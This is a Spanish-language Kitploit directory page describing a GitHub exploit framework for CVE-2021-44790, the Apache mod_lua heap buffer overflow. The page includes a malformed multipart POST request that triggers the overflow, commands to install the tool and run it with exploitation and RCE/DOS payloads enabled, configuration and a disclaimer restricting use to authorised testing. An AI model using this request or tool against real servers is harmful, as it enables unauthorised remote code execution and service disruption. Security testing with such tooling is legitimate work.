Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Advanced exploitation framework with fingerprinting, multi-stage scanning, plugin architecture, professional reporting, screenshot capture, SQLite database, and 95%+ confidence detection. Author: Sudeepa Wanigarathna. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
Web Vulnerability ScannersExploit FrameworksExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
1hace 13 díasAún no revisado

Acerca de

Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Advanced exploitation framework with fingerprinting, multi-stage scanning, plugin architecture, professional reporting, screenshot capture, SQLite database, and 95%+ confidence detection. Author: Sudeepa Wanigarathna.

Compartir

🔥 CVE-2021-44790 - Explotación de desbordamiento de búfer en Apache mod_lua

Version Python License CVE Apache CVSS Author


📋 Resumen

Apache mod_lua Buffer Overflow Exploitation es una plataforma de explotación avanzada de nivel empresarial para CVE-2021-44790, una vulnerabilidad crítica de desbordamiento de búfer en el módulo mod_lua de Apache HTTP Server 2.4.x. Este framework ofrece capacidades integrales de fingerprinting, descubrimiento inteligente de scripts, escaneo en múltiples etapas y generación profesional de informes con detección con más del 95% de confianza.

⚡ Características principales


🎯 Detalles de la vulnerabilidad

Descripción técnica

La vulnerabilidad existe en el módulo mod_lua al procesar solicitudes multipart/form-data. Un subdesbordamiento de enteros en la función lua_request_parsebody() puede provocar un desbordamiento de búfer basado en montón, lo que potencialmente permite la ejecución remota de código.

root@kitploit:~
POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 Capturas de pantalla

Interfaz principalResultados de fingerprint

🚀 Inicio rápido

Instalación

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

Uso básico

root@kitploit:~
# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 Uso detallado

Opciones de línea de comandos

root@kitploit:~
python3 exploit.py [TARGET] [OPTIONS]

Ejemplos

1. Evaluación básica de vulnerabilidades

root@kitploit:~
python3 exploit.py https://example.com --verbose --report all

2. Escaneo de entorno corporativo

root@kitploit:~
python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. Prueba de penetración completa

root@kitploit:~
python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. Escaneo por lotes

root@kitploit:~
python3 exploit.py --batch targets.txt --config config.yaml

5. Consultas a la base de datos

root@kitploit:~
# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ Configuración

config.yaml

root@kitploit:~
# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------

# Scan Settings
threads: 20                    # Concurrent threads
timeout: 10                    # Request timeout in seconds
retries: 3                     # Number of retry attempts
rate_limit: 10                 # Requests per second
max_depth: 3                   # Directory traversal depth
follow_redirects: true         # Follow HTTP redirects
verify_ssl: false              # Verify SSL certificates

# Network Settings
proxy: null                    # Proxy URL
http2: true                    # Enable HTTP/2 support
user_agent: random             # User-Agent (random/specific)
save_packets: false            # Save raw network packets

# Analysis Settings
research_mode: true            # Enable research database
verbose: false                 # Verbose output
scan_only: false               # Scan without exploitation
exploit: false                 # Enable exploitation
all_payloads: false            # Use all payloads

# Payload Settings
payloads:
  detection: true
  memory: true
  rce: true
  dos: false

# Report Settings
report_json: true
report_html: true
report_markdown: true
report_pdf: false
screenshot: false
reports_dir: reports

# Database Settings
database_path: luastorm.db
database_retention: 365

# Directory Settings
logs_dir: logs
screenshots_dir: screenshots

📊 Informes

Panel HTML

  • Gráficos y tablas interactivos
  • Visualización del fingerprint del objetivo
  • Resumen del descubrimiento de scripts
  • Cronología de ejecución de payloads
  • Evaluación de vulnerabilidades
  • Puntuación de riesgo

Informe JSON

root@kitploit:~
{
  "scan_id": "a1b2c3d4",
  "target": {
    "url": "https://example.com",
    "hostname": "example.com",
    "port": 443
  },
  "vulnerable": true,
  "risk_level": "Critical",
  "scan_duration": 45.23,
  "timestamp": "2026-08-04T15:45:23"
}

Informe Markdown

  • Documentación legible para humanos
  • Datos en formato de tabla
  • Fácil de compartir e incrustar
  • Compatible con control de versiones

🗄️ Esquema de la base de datos

root@kitploit:~
-- Targets table
CREATE TABLE targets (
    id INTEGER PRIMARY KEY,
    scan_id TEXT UNIQUE,
    url TEXT,
    hostname TEXT,
    ip TEXT,
    port INTEGER,
    protocol TEXT,
    apache_version TEXT,
    lua_version TEXT,
    os TEXT,
    architecture TEXT,
    waf TEXT,
    cdn TEXT,
    vulnerable INTEGER,
    risk_level TEXT,
    scan_date TEXT,
    duration REAL
);

-- Scripts table
CREATE TABLE scripts (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    path TEXT,
    method TEXT,
    status_code INTEGER,
    content_type TEXT,
    response_time REAL,
    vulnerable INTEGER
);

-- Payloads table
CREATE TABLE payloads (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    script_id INTEGER,
    payload_name TEXT,
    payload_type TEXT,
    success INTEGER,
    response_time REAL,
    indicators TEXT,
    error TEXT
);

🔧 Sistema de plugins

Creación de un plugin

root@kitploit:~
# plugins/my_plugin.py
class MyPlugin:
    plugin_name = "my_plugin"
    plugin_version = "1.0"
    plugin_author = "Your Name"
    
    def __init__(self, config):
        self.config = config
    
    def execute(self, target_info):
        """Execute plugin logic"""
        return {
            'status': 'success',
            'message': 'Plugin executed',
            'data': {'target': target_info.url}
        }

🛡️ Consideraciones de seguridad

  • Solo uso autorizado: Esta herramienta está destinada a pruebas de seguridad autorizadas
  • Cumplimiento legal: Asegúrate de tener permiso antes de realizar pruebas
  • Divulgación responsable: Reporta las vulnerabilidades de manera responsable
  • Protección de datos: Todos los datos sensibles se almacenan localmente

⚠️ Aviso legal

root@kitploit:~
ESTA HERRAMIENTA SE PROPORCIONA ÚNICAMENTE CON FINES EDUCATIVOS Y DE PRUEBAS AUTORIZADAS.

El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito
de prueba es ilegal y poco ético. El autor no asume ninguna responsabilidad por el mal uso,
los daños o las consecuencias legales derivadas del uso de esta herramienta.

Al utilizar esta herramienta, aceptas:
1. Probar únicamente sistemas que poseas o para los que tengas permiso por escrito
2. Cumplir con todas las leyes y regulaciones aplicables
3. Reportar los hallazgos de manera responsable
4. No utilizar esta herramienta con fines maliciosos

📈 Métricas de rendimiento


🗺️ Hoja de ruta

Versión 2.1 (Planificada)

  • Soporte para CVE adicionales
  • Interfaz web
  • Contenerización con Docker
  • Pipeline de CI/CD
  • Más variantes de payloads

Versión 2.2 (Futura)

  • Integración de aprendizaje automático
  • Explotación automatizada
  • Escaneo basado en la nube
  • Funciones de colaboración en equipo
  • Técnicas avanzadas de evasión

🤝 Contribuciones

¡Las contribuciones son bienvenidas! Sigue estas pautas:

  1. Haz un fork del repositorio
  2. Crea una rama de funcionalidad
  3. Realiza tus cambios
  4. Envía un pull request

Configuración de desarrollo

root@kitploit:~
# Clone your fork
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install development dependencies
pip install -r requirements-dev.txt

# Run tests
python -m pytest tests/

👨‍💻 Autor

Sudeepa Wanigarathna

  • Investigador de seguridad y hacker ético
  • GitHub: @CerberusMrXi
  • Enfoque: Investigación de vulnerabilidades y desarrollo de exploits

📄 Licencia

Solo para fines educativos y de pruebas autorizadas

Este software se proporciona "tal cual", sin garantía de ningún tipo, expresa o implícita.


⭐ ¡Da una estrella a este repositorio para apoyar el proyecto!

💡 ¿Encontraste un error? Abre un issue

📧 Contacto: [email protected]


Construido con ❤️ para la comunidad de seguridad

Descargar herramienta
CaracterísticaDescripción
🔍 Fingerprinting avanzadoDetección de versión de Apache, mod_lua, SO, arquitectura, WAF, CDN, contenedor y proveedor de nube
🎯 Descubrimiento inteligenteMás de 7 técnicas de descubrimiento, incluyendo robots.txt, sitemap, análisis de HTML y extracción de JavaScript
💥 Escaneo en múltiples etapasConexión → Fingerprint → Descubrimiento → Verificación → Explotación → Informes
🧩 Sistema de plugins extensibleDesarrollo sencillo de plugins para futuros CVEs
🌐 Motor HTTP inteligenteAgrupación de conexiones, reintentos, soporte HTTP/2 y limitación de velocidad
📊 Informes completosJSON, HTML, Markdown y PDF con paneles interactivos
🎨 Interfaz de terminal atractivaBiblioteca Rich con barras de progreso, tablas y salida codificada por colores
💾 Base de datos de investigaciónAlmacenamiento SQLite con historial completo de escaneos y soporte de consultas
📸 Captura de pantallasCapturas de pantalla automáticas de páginas web para la recopilación de evidencias
🚀 Alto rendimientoMás de 20 hilos concurrentes, más de 100 pools de conexiones
AtributoValor
ID de CVECVE-2021-44790
VulnerabilidadDesbordamiento de búfer (subdesbordamiento de enteros)
Software afectadoApache HTTP Server 2.4.0 hasta 2.4.51
Versión corregidaApache HTTP Server 2.4.52 y posteriores
ComponenteMódulo mod_lua
Vector de ataqueRed (remoto)
Puntuación CVSS9.8 (Crítico)
Impacto de confidencialidadAlto
Impacto de integridadAlto
Impacto de disponibilidadAlto
Madurez del exploitPrueba de concepto disponible
Progreso del escaneoPanel del informe HTML
OpciónDescripciónEjemplo
TARGETURL de destinohttp://target.com
--config FILEArchivo de configuración--config config.yaml
--threads NNúmero de hilos--threads 30
--timeout NTiempo de espera de la solicitud (segundos)--timeout 15
--proxy URLURL del proxy--proxy http://127.0.0.1:8080
--verboseSalida verbosa--verbose
--scan-onlyEscaneo sin explotación--scan-only
--exploitHabilitar explotación--exploit
--all-payloadsUsar todos los payloads--all-payloads
--report FORMATFormato de informe (json/html/markdown/all)--report all
--output DIRDirectorio de salida--output /path/to/reports/
--researchHabilitar modo de investigación--research
--database FILERuta de la base de datos--database luastorm.db
--screenshotTomar capturas de pantalla--screenshot
--batch FILEArchivo por lotes con objetivos--batch targets.txt
--query SQLEjecutar consulta a la base de datos--query "SELECT * FROM targets"
CaracterísticaRendimiento
Fingerprinting< 2 segundos
Descubrimiento de scripts5-10 segundos
Pruebas de payloads1-5 segundos por payload
Generación de informes< 1 segundo
Operaciones de base de datos< 100ms
Hilos concurrentes20+
Pool de conexiones100+